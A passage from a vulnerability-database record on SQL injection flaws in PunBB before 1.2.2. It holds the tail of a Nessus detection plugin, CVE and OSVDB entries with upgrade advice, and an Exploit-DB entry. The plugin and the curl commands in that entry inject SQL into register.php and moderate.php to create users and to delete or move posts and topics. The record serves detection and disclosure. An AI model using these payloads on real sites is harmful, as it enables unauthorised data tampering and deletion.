split(gettimeofday(), sep:\".\", keep:0);\n user = string(\"nessus\", now[0]);\n pass = now[1];\n\n # Try to create a new user.\n url = \"/register.php?action=register\";\n bound = \"bound\";\n boundary = string(\"--\", bound);\n postdata = string(\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"form_sent\"', \"\\r\\n\",\n \"\\r\\n\",\n \"1\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"req_username\"', \"\\r\\n\",\n \"\\r\\n\",\n user, \"\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"req_password1\"', \"\\r\\n\",\n \"\\r\\n\",\n \"whatever\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"req_password2\"', \"\\r\\n\",\n \"\\r\\n\",\n \"whatever\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"req_email1\"', \"\\r\\n\",\n \"\\r\\n\",\n user, \"@example.com\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"language\"', \"\\r\\n\",\n \"\\r\\n\",\n # nb: we're supplying values for language, style, registered, \n # registration_ip, and last_visit. A value of 0 for\n # 'registered' implies the user registered in 12/31/1969,\n # which is the basis for our check below.\n \"English','Oxygen',0,'0.0.0.0',0) -- \\r\\n\",\n\n boundary, \"--\", \"\\r\\n\"\n );\n\n r = http_send_recv3(method: \"POST\", item: dir + url, port: port,\n content_type: \"multipart/form-data; boundary=\"+bound );\n if (isnull(r)) exit(0, \"The web server did not answer\");\n res = r[2];\n\n # Now check the User List for the user we just created.\n r = http_send_recv3(method:\"GET\", port:port,\n item:string(dir, \"/userlist.php?username=\", user, \"&show_group=-1&sort_by=username&sort_dir=ASC&search=Submit\") );\n if (isnull(r)) exit(0);\n res = r[2];\n\n # If they registered in 1969, there's a problem.\n if (egrep(pattern:'class=\"tcr\">.*1969.*</td>', string:res)) {\n rep = string(\n \"**** Nessus has successfully exploited this vulnerability by registering\\n\",\n \"**** the user \", user, \" to PunBB on the remote host;\\n\",\n \"**** you may wish to remove it at your convenience.\\n\"\n );\n security_hole(port:port, extra: rep);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n exit(0);\n }\n }\n}\n", "naslFamily": "CGI abuses", "pluginID": "17224", "cpe": [], "scheme": null}

{"cve": [{"lastseen": "2019-05-29T18:08:13", "bulletinFamily": "NVD", "description": "profile.php in PunBB 1.2.1 allows remote attackers to cause a denial of service (account lockout) by setting the user's password to NULL.", "modified": "2017-07-11T01:32:00", "id": "CVE-2005-0570", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0570", "published": "2005-05-02T04:00:00", "title": "CVE-2005-0570", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:08:13", "bulletinFamily": "NVD", "description": "Multiple SQL injection vulnerabilities in PunBB 1.2.1 allow remote attackers to execute arbitrary SQL commands via the (1) language parameter to register.php, (2) change email feature in profile.php, (3) posts or (4) topics parameter to moderate.php.", "modified": "2017-07-11T01:32:00", "id": "CVE-2005-0569", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0569", "published": "2005-05-02T04:00:00", "title": "CVE-2005-0569", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:08:13", "bulletinFamily": "NVD", "description": "admin_loader.php in PunBB 1.2.1 allows remote attackers to read arbitrary files via the plugin parameter.", "modified": "2017-07-11T01:32:00", "id": "CVE-2005-0571", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0571", "published": "2005-05-02T04:00:00", "title": "CVE-2005-0571", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:09", "bulletinFamily": "software", "description": "## Vulnerability Description\nPunBB contains a flaw that may allow a remote attacker to arbitrarily manipulate user passwords. The issue is triggered due to improper validation of user-supplied input upon submission to the 'profile.php' script. It is possible that the flaw may allow a remote attacker to arbitrary manipulate user passwords resulting in a loss of availability.\n## Solution Description\nUpgrade to version 1.2.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nPunBB contains a flaw that may allow a remote attacker to arbitrarily manipulate user passwords. The issue is triggered due to improper validation of user-supplied input upon submission to the 'profile.php' script. It is possible that the flaw may allow a remote attacker to arbitrary manipulate user passwords resulting in a loss of availability.\n## References:\nVendor URL: http://www.punbb.org/\n[Vendor Specific Advisory URL](http://forums.punbb.org/viewtopic.php?id=6460&action=new)\nSecurity Tracker: 1013294\n[Secunia Advisory ID:14394](https://secuniaresearch.flexerasoftware.com/advisories/14394/)\n[Related OSVDB ID: 14130](https://vulners.com/osvdb/OSVDB:14130)\n[Related OSVDB ID: 14128](https://vulners.com/osvdb/OSVDB:14128)\n[Related OSVDB ID: 14131](https://vulners.com/osvdb/OSVDB:14131)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-02/0430.html\n[CVE-2005-0570](https://vulners.com/cve/CVE-2005-0570)\n", "modified": "2005-02-24T08:17:36", "published": "2005-02-24T08:17:36", "href": "https://vulners.com/osvdb/OSVDB:14129", "id": "OSVDB:14129", "type": "osvdb", "title": "PunBB profile.php Arbitrary User Password Manipulation", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:09", "bulletinFamily": "software", "description": "## Vulnerability Description\nPunBB and BLOG:CMS contain a flaw that will allow a remote attacker to inject arbitrary SQL code. The problem is that multiple parameters in the 'register.php' script are not verified properly and will allow a remote attacker to inject or manipulate SQL queries.\n## Solution Description\nUpgrade to PunBB version 1.2.2 or higher or BLOG:CMS version 3.6.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nPunBB and BLOG:CMS contain a flaw that will allow a remote attacker to inject arbitrary SQL code. The problem is that multiple parameters in the 'register.php' script are not verified properly and will allow a remote attacker to inject or manipulate SQL queries.\n## References:\nVendor URL: http://blogcms.com/\nVendor URL: http://www.punbb.org/\nVendor Specific News/Changelog Entry: http://blogcms.com/wiki/changelog\n[Vendor Specific Advisory URL](http://forums.punbb.org/viewtopic.php?id=6460&action=new)\nSecurity Tracker: 1013294\n[Secunia Advisory ID:14394](https://secuniaresearch.flexerasoftware.com/advisories/14394/)\n[Secunia Advisory ID:14538](https://secuniaresearch.flexerasoftware.com/advisories/14538/)\n[Related OSVDB ID: 14130](https://vulners.com/osvdb/OSVDB:14130)\n[Related OSVDB ID: 14129](https://vulners.com/osvdb/OSVDB:14129)\n[Related OSVDB ID: 14131](https://vulners.com/osvdb/OSVDB:14131)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-02/0430.html\nISS X-Force ID: 19473\n[CVE-2005-0569](https://vulners.com/cve/CVE-2005-0569)\n", "modified": "2005-02-24T08:17:36", "published": "2005-02-24T08:17:36", "href": "https://vulners.com/osvdb/OSVDB:14128", "id": "OSVDB:14128", "type": "osvdb", "title": "PunBB/BLOG:CMS register.php Multiple Parameter SQL Injection", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:10", "bulletinFamily": "software", "description": "## Vulnerability Description\nPunBB and BLOG:CMS contain a flaw that will allow a remote attacker to inject arbitrary SQL code. The problem is that the 'is_valid_email' function in the 'profile.php' script is not verified properly and will allow a remote attacker to inject or manipulate SQL queries.\n## Solution Description\nUpgrade to PunBB version 1.2.2 or higher or BLOG:CMS version 3.6.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nPunBB and BLOG:CMS contain a flaw that will allow a remote attacker to inject arbitrary SQL code. The problem is that the 'is_valid_email' function in the 'profile.php' script is not verified properly and will allow a remote attacker to inject or manipulate SQL queries.\n## References:\nVendor URL: http://blogcms.com/\nVendor URL: http://www.punbb.org/\nVendor Specific News/Changelog Entry: http://blogcms.com/wiki/changelog\n[Vendor Specific Advisory URL](http://forums.punbb.org/viewtopic.php?id=6460&action=new)\nSecurity Tracker: 1013294\n[Secunia Advisory ID:14394](https://secuniaresearch.flexerasoftware.com/advisories/14394/)\n[Secunia Advisory ID:14538](https://secuniaresearch.flexerasoftware.com/advisories/14538/)\n[Related OSVDB ID: 14129](https://vulners.com/osvdb/OSVDB:14129)\n[Related OSVDB ID: 14128](https://vulners.com/osvdb/OSVDB:14128)\n[Related OSVDB ID: 14131](https://vulners.com/osvdb/OSVDB:14131)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-02/0430.html\nISS X-Force ID: 19473\n[CVE-2005-0569](https://vulners.com/cve/CVE-2005-0569)\n", "modified": "2005-02-24T08:17:36", "published": "2005-02-24T08:17:36", "href": "https://vulners.com/osvdb/OSVDB:14130", "id": "OSVDB:14130", "type": "osvdb", "title": "PunBB/BLOG:CMS profile.php Change Email SQL Injection", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:10", "bulletinFamily": "software", "description": "## Vulnerability Description\nPunBB and BLOG:CMS contain a flaw that will allow a remote attacker to inject arbitrary SQL code. The problem is that multiple parameters in the 'moderate.php' script are not verified properly and will allow a remote attacker to inject or manipulate SQL queries.\n## Solution Description\nUpgrade to PunBB version 1.2.2 or higher or BLOG:CMS version 3.6.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nPunBB and BLOG:CMS contain a flaw that will allow a remote attacker to inject arbitrary SQL code. The problem is that multiple parameters in the 'moderate.php' script are not verified properly and will allow a remote attacker to inject or manipulate SQL queries.\n## References:\nVendor URL: http://blogcms.com/\nVendor URL: http://www.punbb.org/\nVendor Specific News/Changelog Entry: http://blogcms.com/wiki/changelog\n[Vendor Specific Advisory URL](http://forums.punbb.org/viewtopic.php?id=6460&action=new)\nSecurity Tracker: 1013294\n[Secunia Advisory ID:14394](https://secuniaresearch.flexerasoftware.com/advisories/14394/)\n[Secunia Advisory ID:14538](https://secuniaresearch.flexerasoftware.com/advisories/14538/)\n[Related OSVDB ID: 14130](https://vulners.com/osvdb/OSVDB:14130)\n[Related OSVDB ID: 14129](https://vulners.com/osvdb/OSVDB:14129)\n[Related OSVDB ID: 14128](https://vulners.com/osvdb/OSVDB:14128)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-02/0430.html\nISS X-Force ID: 19473\n[CVE-2005-0569](https://vulners.com/cve/CVE-2005-0569)\nBugtraq ID: 12652\n", "modified": "2005-02-24T08:17:36", "published": "2005-02-24T08:17:36", "href": "https://vulners.com/osvdb/OSVDB:14131", "id": "OSVDB:14131", "type": "osvdb", "title": "PunBB/BLOG:CMS moderate.php Multiple Parameter SQL Injection", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:10", "bulletinFamily": "software", "description": "## Solution Description\nUpgrade to version 1.2.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor URL: http://www.punbb.org/\n[Vendor Specific Advisory URL](http://forums.punbb.org/viewtopic.php?id=6460&action=new)\nSecurity Tracker: 1013294\n[Secunia Advisory ID:14394](https://secuniaresearch.flexerasoftware.com/advisories/14394/)\n[CVE-2005-0571](https://vulners.com/cve/CVE-2005-0571)\n", "modified": "2005-02-24T08:17:36", "published": "2005-02-24T08:17:36", "href": "https://vulners.com/osvdb/OSVDB:14132", "id": "OSVDB:14132", "type": "osvdb", "title": "PunBB admin_loader.php Arbitrary File Content Access", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-02-03T00:46:46", "bulletinFamily": "exploit", "description": "PunBB 3.0/3.1 Multiple Remote Input Validation Vulnerabilities. CVE-2005-0569. Webapps exploit for php platform", "modified": "2005-02-24T00:00:00", "published": "2005-02-24T00:00:00", "id": "EDB-ID:25160", "href": "https://www.exploit-db.com/exploits/25160/", "type": "exploitdb", "title": "PunBB 3.0/3.1 - Multiple Remote Input Validation Vulnerabilities", "sourceData": "source: http://www.securityfocus.com/bid/12652/info\r\n\r\nMultiple remote input validation vulnerabilities affect PunBB. These issues are due to a failure of the application to sanitize user-supplied input prior to using it to carry out critical functions.\r\n\r\nThe first issue is an SQL injection issue in the 'register.php' script. The second issue is an SQL injection issue in the 'moderate.php' script. A third SQL injection issue exists in the 'profile.php' script. Finally an access validation issue affects the 'profile.php' script.\r\n\r\nAn attacker may leverage these issues to have arbitrary SQL queries executed against the database; this may facilitate data corruption or manipulation. Furthermore one of these issues may be leveraged to trigger a denial of service condition against current user by setting their passwords to a NULL value.\r\n\r\nThis example demonstrates the SQL injection vulnerability in the language parameter:\r\n\r\ncurl --form form_sent=1 --form req_username=sha --form req_password1=passwd --form req_paspasswd --form req_email1=sha@punbb.com --form\r\nlanguage=\"English', 'Oxygen', 0, '0.0.0.0', 0) -- \" http://target/register.php?action=registerer\r\n\r\nAttacks delete posts:\r\ncurl --referer http://www.example.com/moderate.php --form posts=\"0) -- this won't show\" --form delete_posts_comply=1 --cookie punbb_cookie=<valid\r\ncookie> target/moderate.php?fid=1\\&tid=1\r\n\r\nAttacks move topics:\r\ncurl --referer http://www.example.com/moderate.php --form topics=\"2) -- this won't show\" --form move_to_forum=2 --form move_topics=1 --form\r\nmove_topics_to=1 --cookie punbb_cookie=<valid cookie> target/moderate.php?fid=1\r\n\r\nAttacks delete topics:\r\ncurl --referer http://www.example.com/moderate.php --form topics=\"2) -- this won't show\" --form delete_topics=1 --form delete_topics_comply=1\r\n--cookie punbb_cookie=<valid cookie> target/moderate.php?fid=1\r\n\r\nAttacks open/close:\r\ncurl --referer http://www.example.com/moderate.php --form \"topics[0) -- this won't show]\"= --form open=1 --cookie \"punbb_cookie=<valid cookie>\r\ntarget/moderate.php?fid=1\r\n\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/25160/"}]}

PunBB &lt; 1.2.2 Multiple Input Validation Vulnerabilities

Description

PunBB < 1.2.2 Multiple Input Validation Vulnerabilities